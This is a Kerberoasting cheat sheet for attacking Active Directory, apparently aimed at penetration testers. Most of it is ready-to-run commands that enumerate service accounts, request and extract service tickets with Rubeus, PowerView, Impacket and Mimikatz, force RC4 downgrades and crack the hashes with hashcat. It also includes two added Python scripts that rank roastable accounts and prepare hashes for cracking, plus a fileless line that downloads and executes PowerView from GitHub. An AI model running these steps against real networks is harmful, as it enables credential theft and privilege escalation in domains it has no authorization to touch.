PRIMARY CATEGORY → KERBEROAST

Theory

Kerberoasting Attack


Enumeration - UNIX-like

Ldapsearch

Ldapsearch

Filter → '(&(ObjectCategory=person)(ObjectClass=user)(servicePrincipalName=*))'

objectCategory=person limits the result to user accounts; computer accounts carry SPNs too, but their passwords are long and random, so their tickets are not worth cracking

ldapsearch -LLL -x -H 'ldap://<TARGET>' -D '<USER>@<DOMAIN>' -w '<PASSWD>' -b 'DC=<DOMAIN>,DC=<TLD>' '(&(ObjectCategory=person)(ObjectClass=user)(servicePrincipalName=*))' samAccountName dn userPrincipalName servicePrincipalName | grep -viP --color -- '^#.+$' 
Impacket’s GetUserSPNs.py

GetUserSPNs.py

GetUserSPNs.py -dc-ip <TARGET> '<DOMAIN>/<USER>:<PASSWD>'
Go-Windapsearch

Go-Windapsearch

windapsearch --domain '<DOMAIN>' --dc '<DC>' --username '<USER>' --password '<PASSWD>' --module user-spns

Enumeration - Windows

AD Powershell Module

Powershell AD Module

Setup

From a domain-joined host

Import-Module ActiveDirectory
Usage
Get-ADUser -Properties * -LdapFilter '(&(servicePrincipalName=*)(!(samAccountName=krbtgt))(!(userAccountControl:1.2.840.113556.1.4.803:=2)))' | Select-Object samAccountName, servicePrincipalName

1.2.840.113556.1.4.803 is the bitwise AND matching rule; bit 2 of userAccountControl is ACCOUNTDISABLE, so the filter drops disabled accounts as well as krbtgt
DSQuery

Requires the AD DS tools (RSAT) to be installed on the host; any domain user can run the query

dsquery * -Filter "(&(ObjectCategory=Person)(ObjectClass=user)(servicePrincipalName=*))" -Attr samAccountName servicePrincipalName
Powerview

Powerview.ps1

Powerview.ps1 - BC Security

Setup
  • Fileless
IEX (New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1')
  • Touching Disk
IWR -UseBasicParsing -Uri 'https://raw.githubusercontent.com/BC-SECURITY/Empire/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1' -OutFile '.\powerview.ps1'
Import-Module .\powerview.ps1
Usage

Get-DomainUser

Get-DomainUser -Spn | Select-Object samAccountName, ServicePrincipalName
  • Cross Forest Trust
Get-DomainUser -Spn -Domain '<TRUST_DOMAIN>' | Select samAccountName, ServicePrincipalName
Setspn.exe

Setspn.exe

setspn.exe -Q */*

Kerberoasting - UNIX-like

Impacket’s GetUserSPNs.py
GetUserSPNs.py -dc-ip <TARGET> -request -outputfile <OUTPUTFILE> '<DOMAIN>/<USER>:<PASSWD>'
Single TGS_REQ for a certain Service Account
GetUserSPNs.py -dc-ip <TARGET> -request-user <SERVICE_ACCOUNT> -outputfile <OUTPUTFILE> '<DOMAIN>/<USER>:<PASSWD>'

Kerberoasting - Windows

Rubeus

Rubeus

Kerberoasting Summary

W/O requesting any Service Ticket

.\Rubeus.exe kerberoast /stats

Without requesting a single ticket this reports the number of kerberoastable users, their supported encryption types (msDS-SupportedEncryptionTypes) and when each password was last set (pwdLastSet), which is what decides which accounts are worth roasting first
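The triage that Rubeus /stats does by hand, as an added example that is not part of the original page or of Rubeus: decode the msDS-SupportedEncryptionTypes bitmask, convert the FILETIME in pwdLastSet to a date, and rank accounts so that RC4-capable ones with the oldest passwords come first. The sample entries, the account names and the corp.local realm are constructed for the example; the attribute names and bit values are the real AD ones.

```python
from datetime import datetime, timedelta, timezone

# msDS-SupportedEncryptionTypes bit flags (MS-KILE 2.2.7)
ENC_FLAGS = {
    0x01: "DES_CBC_CRC",
    0x02: "DES_CBC_MD5",
    0x04: "RC4_HMAC",
    0x08: "AES128_CTS_HMAC_SHA1_96",
    0x10: "AES256_CTS_HMAC_SHA1_96",
}

# pwdLastSet is a Windows FILETIME: 100 ns ticks since 1601-01-01 00:00 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def decode_enc_types(value):
    """Turn the msDS-SupportedEncryptionTypes bitmask into etype names.
    An unset or zero attribute is reported the way Rubeus /stats does,
    as RC4_HMAC_DEFAULT: the KDC falls back to RC4 for such accounts."""
    if not value:
        return ["RC4_HMAC_DEFAULT"]
    return [name for bit, name in ENC_FLAGS.items() if value & bit]


def filetime_to_datetime(ft):
    """Convert a FILETIME integer to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def rc4_roastable(enc_types):
    """True when an etype 23 (RC4) service ticket can be requested for the
    account, i.e. the hash cracks as hashcat mode 13100 instead of the far
    slower AES modes 19600/19700."""
    return any(name.startswith("RC4_HMAC") for name in enc_types)


def triage(entries, now):
    """Rank kerberoastable accounts: RC4-capable first, oldest password first.
    `entries` are dicts keyed by LDAP attribute name; `now` is passed in so
    the ranking is reproducible."""
    rows = []
    for entry in entries:
        enc = decode_enc_types(entry.get("msDS-SupportedEncryptionTypes"))
        last_set = filetime_to_datetime(entry["pwdLastSet"])
        rows.append({
            "sam": entry["sAMAccountName"],
            "spns": entry["servicePrincipalName"],
            "enc": enc,
            "rc4": rc4_roastable(enc),
            "pwd_age_days": (now - last_set).days,
            "admin": entry.get("adminCount") == 1,
        })
    rows.sort(key=lambda r: (not r["rc4"], -r["pwd_age_days"]))
    return rows


# Constructed sample entries, shaped like the ldapsearch / Get-DomainUser
# output above; not taken from any real directory.
SAMPLE = [
    {"sAMAccountName": "svc_sql", "servicePrincipalName": ["MSSQLSvc/sql01.corp.local:1433"],
     "pwdLastSet": 132223104000000000, "adminCount": 1},                          # attribute unset -> RC4 default
    {"sAMAccountName": "svc_web", "servicePrincipalName": ["HTTP/web01.corp.local"],
     "msDS-SupportedEncryptionTypes": 0x18, "pwdLastSet": 133000000000000000},   # AES only
    {"sAMAccountName": "svc_backup", "servicePrincipalName": ["backup/bk01.corp.local"],
     "msDS-SupportedEncryptionTypes": 0x1C, "pwdLastSet": 131000000000000000},   # RC4 + AES
]

if __name__ == "__main__":
    for r in triage(SAMPLE, datetime.now(timezone.utc)):
        flag = "RC4" if r["rc4"] else "AES-only"
        print(f"{r['sam']:<12} {flag:<9} pwd age {r['pwd_age_days']:>5}d "
              f"admin={r['admin']!s:<5} {', '.join(r['enc'])}")
```

Feed it the attributes from any of the enumeration queries above (sAMAccountName, servicePrincipalName, msDS-SupportedEncryptionTypes, pwdLastSet, adminCount) to get the same ordering Rubeus /stats suggests: an AES-only account still yields a ticket, but it goes to the bottom of the list because 19600/19700 crack orders of magnitude slower than 13100.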

Kerberoasting for Privileged/Protected Service Accounts

LDAP Filter → adminCount=1

.\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Kerberoasting for a certain User Account
.\Rubeus.exe kerberoast /user:<USER> /nowrap
  • Forcing Downgrade Encryption

Uses the tgtdeleg trick to request an RC4 (etype 23) service ticket, so the hash cracks as type 13100 instead of the much slower AES modes; only works against DCs older than Windows Server 2019, newer KDCs return AES tickets for accounts that support AES regardless of the requested etype

.\Rubeus.exe kerberoast /user:<USER> /tgtdeleg /nowrap
Powerview

Get-DomainUser + Get-DomainSPNTicket

Get-DomainUser -Identity <USER> | Get-DomainSPNTicket -Format Hashcat
Export all Service Tickets to a CSV File
Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\<OUTPUTFILE>.csv -NoTypeInformation
SetSPN.exe + Powershell (.NET Class) + Mimikatz
Target a Service (User) Account’s SPN

SetSPN.exe

setspn.exe -Q */*
Request a ST via TGS_REQ for a certain SPN and Inject it in Memory

System.IdentityModel.Tokens.KerberosRequestorSecurityToken .NET class via PowerShell

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "<SPN>"
Extract Service Tickets from Memory with Mimikatz

Mimikatz.exe

base64 /out:true
kerberos::list /export
Converting Base64 Blob into a Kirbi File
base64 -d < <( echo -n "<BASE64_BLOB>" | tr -d '\n' ) > <OUTPUTFILE>.kirbi
Extracting a crackable hash format from a Kirbi file

Kirbi2john

python2.7 kirbi2john.py <KIRBI_FILE>

The above command extracts a hash in John the Ripper's format ($krb5tgs$<KIRBI_FILE>:<CHECKSUM>$<EDATA>)

To convert it into hashcat's 13100 format proceed as follows; the text between the asterisks is only a label for RC4 hashes (the RC4-HMAC key is not salted), so keeping the kirbi file name there is fine

sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' <JOHN_HASH> > <HASHCAT_HASH>
Cracking the Kerberoasting Hash

Hashcat

Hashcat Type for RC4_HMAC_MD5 (etype 23) → 13100
Hashcat Type for AES128_CTS_HMAC_SHA1_96 (etype 17) → 19600
Hashcat Type for AES256_CTS_HMAC_SHA1_96 (etype 18) → 19700

hashcat --force -O --attack-mode 0 --hash-type 13100 <HASH> <WORDLIST>
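The John-to-hashcat conversion and the mode selection from the two sections above, as an added example that is not part of the original page or of the kirbi2john/hashcat projects. It rewrites a kirbi2john line into 13100 format like the sed does, refuses AES tickets (where a file-name label would produce an uncrackable hash, because modes 19600/19700 derive the key from realm and user), and reads the etype out of an existing hashcat line to pick -m. The hex values, account names and the CORP.LOCAL realm in the demo are constructed filler, not real ticket bytes.

```python
import re

# hashcat modes for Kerberos 5 TGS-REP hashes, by Kerberos encryption type (etype)
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}

# kirbi2john.py output, as consumed by the sed above: $krb5tgs$<label>:<checksum>$<edata>
JOHN_RE = re.compile(
    r"^\$krb5tgs\$(?P<label>[^:]+):(?P<checksum>[0-9a-f]+)\$(?P<edata>[0-9a-f]+)$", re.I)
# hashcat 13100: $krb5tgs$23$*<label, usually user$REALM$spn>*$<16-byte checksum>$<edata>
HC_RC4_RE = re.compile(
    r"^\$krb5tgs\$23\$\*(?P<label>[^*]*)\*\$(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$", re.I)
# hashcat 19600/19700: $krb5tgs$17|18$<user>$<REALM>$[*<spn>*$]<12-byte checksum>$<edata>
HC_AES_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>17|18)\$(?P<user>[^$]*)\$(?P<realm>[^$]*)\$(?:\*(?P<spn>[^*]*)\*\$)?"
    r"(?P<checksum>[0-9a-f]{24})\$(?P<edata>[0-9a-f]+)$", re.I)


def john_to_hashcat(line, user=None, realm=None, spn=None):
    """Rewrite a kirbi2john line into hashcat's 13100 format, like the sed above.
    Mode 13100 treats the *...* part as a label only (RC4-HMAC keys are not
    salted), so the kirbi file name is kept unless user/realm/spn are given.
    AES tickets (12-byte HMAC-SHA1-96 checksum) are refused: modes 19600/19700
    need the real realm and user as salt, which the John label does not carry."""
    m = JOHN_RE.match(line.strip())
    if not m:
        raise ValueError("not a kirbi2john $krb5tgs$ line")
    if len(m["checksum"]) != 32:
        raise ValueError("checksum is not 16 bytes: not an RC4 (etype 23) ticket")
    label = m["label"] if user is None else f"{user}${realm}${spn}"
    return f"$krb5tgs$23$*{label}*${m['checksum']}${m['edata']}"


def hashcat_mode(hash_line):
    """Return the hashcat -m value (13100/19600/19700) for a $krb5tgs$ hash,
    or None when the line is not in a recognised hashcat format."""
    line = hash_line.strip()
    if HC_RC4_RE.match(line):
        return HASHCAT_MODES[23]
    m = HC_AES_RE.match(line)
    if m:
        return HASHCAT_MODES[int(m["etype"])]
    return None


if __name__ == "__main__":
    # constructed demo values: "a"/"b"/"c"/"d" runs stand in for real hex
    john_line = "$krb5tgs$sqldev.kirbi:" + "a" * 32 + "$" + "b" * 64
    hc = john_to_hashcat(john_line, "sqldev", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433")
    print(hc)
    print("hashcat -m", hashcat_mode(hc))
    aes = "$krb5tgs$18$svc_web$CORP.LOCAL$*HTTP/web01.corp.local*$" + "c" * 24 + "$" + "d" * 64
    print("hashcat -m", hashcat_mode(aes))
```

Run it over the file produced by GetUserSPNs.py -request or Get-DomainSPNTicket -Format Hashcat before starting a cracking job: a mixed RC4/AES output file has to be split by mode, since hashcat rejects lines that do not match the -m it was given.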

Kerberoasting Across-Trust - UNIX-like

Enumeration
Impacket’s GetUserSPNs.py

GetUserSPNs.py

GetUserSPNs.py -target-domain '<TRUSTED_DOMAIN>' '<TRUSTEE_DOMAIN>/<USER>:<PASSWD>'
Kerberoasting
Impacket’s GetUserSPNs.py

GetUserSPNs.py

GetUserSPNs.py -target-domain '<TRUSTED_DOMAIN>' -request -outputfile '<OUTPUT_FILE>' '<TRUSTEE_DOMAIN>/<USER>:<PASSWD>'
Single TGS_REQ for a certain Service Account
GetUserSPNs.py -target-domain '<TRUSTED_DOMAIN>' -request-user '<SERVICE_ACCOUNT>' -outputfile '<OUTPUT_FILE>' '<TRUSTEE_DOMAIN>/<USER>:<PASSWD>'

Kerberoasting Across-Trust - Windows

Enumeration
Powerview

Powerview.ps1

Get-DomainUser -Domain '<TRUSTED_DOMAIN>' -SPN | Select samAccountName, servicePrincipalName
Kerberoasting
Powerview

Powerview.ps1

Get-DomainUser -Domain '<TRUSTED_DOMAIN>' -SPN | Get-DomainSPNTicket -Format Hashcat
Rubeus

Rubeus.exe

.\Rubeus.exe kerberoast /user:<USER> /domain:<TRUSTED_DOMAIN> /nowrap

Cracking

Hashcat

Hashcat Type → 13100 for RC4 (etype 23) tickets; 19600 / 19700 for AES128 / AES256 tickets

Usage
hashcat --force -O --attack-mode 0 --hash-type 13100 <HASH> <WORDLIST>
Display Result
hashcat --force -O --attack-mode 0 --hash-type 13100 <HASH> <WORDLIST> --show